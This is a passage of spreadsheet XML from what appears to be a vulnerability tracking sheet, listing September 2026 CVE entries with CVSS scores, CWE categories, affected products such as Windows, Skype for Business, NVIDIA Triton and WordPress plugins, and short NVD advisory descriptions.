      <c r="G711" s="5" t="inlineStr"/>
      <c r="H711" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I711" s="5" t="inlineStr"/>
      <c r="J711" s="5" t="inlineStr"/>
      <c r="K711" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L711" s="5" t="inlineStr"/>
      <c r="M711" s="5" t="inlineStr"/>
      <c r="N711" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O711" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P711" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q711" s="5" t="inlineStr"/>
      <c r="R711" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S711" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in a Security feature bypass. An attacker with high privileges could leverage this vulnerability to access unauthorized files or directories outside the intended restrictions, causing a limited disruption to availability. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="T711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77110</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82053</t>
        </is>
      </c>
      <c r="D712" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E712" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F712" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G712" s="5" t="inlineStr"/>
      <c r="H712" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I712" s="5" t="inlineStr"/>
      <c r="J712" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K712" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L712" s="5" t="inlineStr"/>
      <c r="M712" s="5" t="inlineStr"/>
      <c r="N712" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O712" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P712" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q712" s="5" t="inlineStr"/>
      <c r="R712" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S712" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86073</t>
        </is>
      </c>
      <c r="D713" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E713" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F713" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G713" s="5" t="inlineStr"/>
      <c r="H713" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I713" s="5" t="inlineStr"/>
      <c r="J713" s="5" t="inlineStr"/>
      <c r="K713" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L713" s="5" t="inlineStr"/>
      <c r="M713" s="5" t="inlineStr"/>
      <c r="N713" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O713" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P713" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q713" s="5" t="inlineStr"/>
      <c r="R713" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S713" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86073</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0860</t>
        </is>
      </c>
      <c r="D714" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E714" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F714" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G714" s="5" t="inlineStr"/>
      <c r="H714" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I714" s="5" t="inlineStr"/>
      <c r="J714" s="5" t="inlineStr"/>
      <c r="K714" s="5" t="inlineStr"/>
      <c r="L714" s="5" t="inlineStr"/>
      <c r="M714" s="5" t="inlineStr"/>
      <c r="N714" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O714" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P714" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q714" s="5" t="inlineStr"/>
      <c r="R714" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S714" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to gain access to sensitive kernel information.
This issue affects Valhall GPU Kernel Driver: from r29p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="T714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0860</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16025</t>
        </is>
      </c>
      <c r="D715" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E715" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F715" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G715" s="5" t="inlineStr"/>
      <c r="H715" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I715" s="5" t="inlineStr"/>
      <c r="J715" s="5" t="inlineStr"/>
      <c r="K715" s="5" t="inlineStr"/>
      <c r="L715" s="5" t="inlineStr"/>
      <c r="M715" s="5" t="inlineStr"/>
      <c r="N715" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O715" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P715" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q715" s="5" t="inlineStr"/>
      <c r="R715" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="S715" s="5" t="inlineStr">
        <is>
          <t>Improper validation of specified quantity in input vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Input Data Manipulation.
This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t>
        </is>
      </c>
      <c r="T715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16025</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16037</t>
        </is>
      </c>
      <c r="D716" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E716" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F716" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G716" s="5" t="inlineStr"/>
      <c r="H716" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I716" s="5" t="inlineStr"/>
      <c r="J716" s="5" t="inlineStr"/>
      <c r="K716" s="5" t="inlineStr"/>
      <c r="L716" s="5" t="inlineStr"/>
      <c r="M716" s="5" t="inlineStr"/>
      <c r="N716" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O716" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P716" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q716" s="5" t="inlineStr"/>
      <c r="R716" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="S716" s="5" t="inlineStr">
        <is>
          <t>Observable timing discrepancy vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Black Box Reverse Engineering.
This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t>
        </is>
      </c>
      <c r="T716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16037</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16497</t>
        </is>
      </c>
      <c r="D717" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E717" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F717" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G717" s="5" t="inlineStr"/>
      <c r="H717" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I717" s="5" t="inlineStr"/>
      <c r="J717" s="5" t="inlineStr"/>
      <c r="K717" s="5" t="inlineStr"/>
      <c r="L717" s="5" t="inlineStr"/>
      <c r="M717" s="5" t="inlineStr"/>
      <c r="N717" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O717" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P717" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q717" s="5" t="inlineStr"/>
      <c r="R717" s="5" t="inlineStr">
        <is>
          <t>CWE-834</t>
        </is>
      </c>
      <c r="S717" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could cause excessive iteration. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16497</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28604</t>
        </is>
      </c>
      <c r="D718" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E718" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F718" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G718" s="5" t="inlineStr"/>
      <c r="H718" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I718" s="5" t="inlineStr"/>
      <c r="J718" s="5" t="inlineStr"/>
      <c r="K718" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L718" s="5" t="inlineStr"/>
      <c r="M718" s="5" t="inlineStr"/>
      <c r="N718" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O718" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P718" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q718" s="5" t="inlineStr"/>
      <c r="R718" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S718" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible use after free due to a race condition. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28604</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3174</t>
        </is>
      </c>
      <c r="D719" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E719" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F719" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G719" s="5" t="inlineStr"/>
      <c r="H719" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I719" s="5" t="inlineStr"/>
      <c r="J719" s="5" t="inlineStr"/>
      <c r="K719" s="5" t="inlineStr"/>
      <c r="L719" s="5" t="inlineStr"/>
      <c r="M719" s="5" t="inlineStr"/>
      <c r="N719" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O719" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P719" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q719" s="5" t="inlineStr"/>
      <c r="R719" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S719" s="5" t="inlineStr">
        <is>
          <t>The Event Tickets and Registration plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the Stripe OAuth return endpoint in all versions up to, and including, 5.27.4. This makes it possible for unauthenticated attackers to overwrite the site's Stripe merchant credentials (access tokens, publishable keys, and account ID), diverting all subsequent payment processing to the attacker's Stripe account.</t>
        </is>
      </c>
      <c r="T719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3174</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47625</t>
        </is>
      </c>
      <c r="D720" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E720" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F720" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G720" s="5" t="inlineStr"/>
      <c r="H720" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I720" s="5" t="inlineStr"/>
      <c r="J720" s="5" t="inlineStr"/>
      <c r="K720" s="5" t="inlineStr"/>
      <c r="L720" s="5" t="inlineStr"/>
      <c r="M720" s="5" t="inlineStr"/>
      <c r="N720" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O720" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P720" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q720" s="5" t="inlineStr"/>
      <c r="R720" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S720" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could abuse missing authorization. A successful exploit of this vulnerability might lead to information disclosure, data tampering, and denial of service.</t>
        </is>
      </c>
      <c r="T720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47625</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48888</t>
        </is>
      </c>
      <c r="D721" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E721" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F721" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G721" s="5" t="inlineStr"/>
      <c r="H721" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I721" s="5" t="inlineStr"/>
      <c r="J721" s="5" t="inlineStr"/>
      <c r="K721" s="5" t="inlineStr"/>
      <c r="L721" s="5" t="inlineStr"/>
      <c r="M721" s="5" t="inlineStr"/>
      <c r="N721" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O721" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P721" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q721" s="5" t="inlineStr"/>
      <c r="R721" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S721" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in Automattic WooCommerce allows HTTP DoS.
This issue affects WooCommerce: from n/a before 11.1.0.</t>
        </is>
      </c>
      <c r="T721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48888</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57098</t>
        </is>
      </c>
      <c r="D722" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E722" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F722" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G722" s="5" t="inlineStr"/>
      <c r="H722" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I722" s="5" t="inlineStr"/>
      <c r="J722" s="5" t="inlineStr"/>
      <c r="K722" s="5" t="inlineStr">
        <is>
          <t>microsoft:remote_desktop_client</t>
        </is>
      </c>
      <c r="L722" s="5" t="inlineStr"/>
      <c r="M722" s="5" t="inlineStr"/>
      <c r="N722" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O722" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P722" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q722" s="5" t="inlineStr"/>
      <c r="R722" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S722" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Windows RDP Client allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57098</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57099</t>
        </is>
      </c>
      <c r="D723" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E723" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F723" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G723" s="5" t="inlineStr"/>
      <c r="H723" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I723" s="5" t="inlineStr"/>
      <c r="J723" s="5" t="inlineStr"/>
      <c r="K723" s="5" t="inlineStr"/>
      <c r="L723" s="5" t="inlineStr"/>
      <c r="M723" s="5" t="inlineStr"/>
      <c r="N723" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O723" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P723" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q723" s="5" t="inlineStr"/>
      <c r="R723" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S723" s="5" t="inlineStr">
        <is>
          <t>Allocation of resources without limits or throttling in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57099</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62759</t>
        </is>
      </c>
      <c r="D724" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E724" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F724" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G724" s="5" t="inlineStr"/>
      <c r="H724" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I724" s="5" t="inlineStr"/>
      <c r="J724" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K72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24" s="5" t="inlineStr"/>
      <c r="M724" s="5" t="inlineStr"/>
      <c r="N724" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O724" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P724" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q724" s="5" t="inlineStr"/>
      <c r="R724" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S724" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by spoofing in Windows Netlogon allows an unauthorized attacker to perform spoofing over an adjacent network.</t>
        </is>
      </c>
      <c r="T724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62759</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62813</t>
        </is>
      </c>
      <c r="D725" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E725" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F725" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G725" s="5" t="inlineStr"/>
      <c r="H725" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I725" s="5" t="inlineStr"/>
      <c r="J725" s="5" t="inlineStr"/>
      <c r="K725" s="5" t="inlineStr"/>
      <c r="L725" s="5" t="inlineStr"/>
      <c r="M725" s="5" t="inlineStr"/>
      <c r="N725" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O725" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P725" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q725" s="5" t="inlineStr"/>
      <c r="R725" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S725" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62813</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66304</t>
        </is>
      </c>
      <c r="D726" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E726" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F726" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G726" s="5" t="inlineStr"/>
      <c r="H726" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I726" s="5" t="inlineStr"/>
      <c r="J726" s="5" t="inlineStr"/>
      <c r="K726" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L726" s="5" t="inlineStr"/>
      <c r="M726" s="5" t="inlineStr"/>
      <c r="N726" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O726" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P726" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q726" s="5" t="inlineStr"/>
      <c r="R726" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S726" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Skype for Business allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66304</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66307</t>
        </is>
      </c>
      <c r="D727" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E727" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F727" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G727" s="5" t="inlineStr"/>
      <c r="H727" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I727" s="5" t="inlineStr"/>
      <c r="J727" s="5" t="inlineStr"/>
      <c r="K727" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L727" s="5" t="inlineStr"/>
      <c r="M727" s="5" t="inlineStr"/>
      <c r="N727" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O727" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P727" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q727" s="5" t="inlineStr"/>
      <c r="R727" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S727" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Skype for Business allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66307</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="5" t="inlineStr">
        <is>
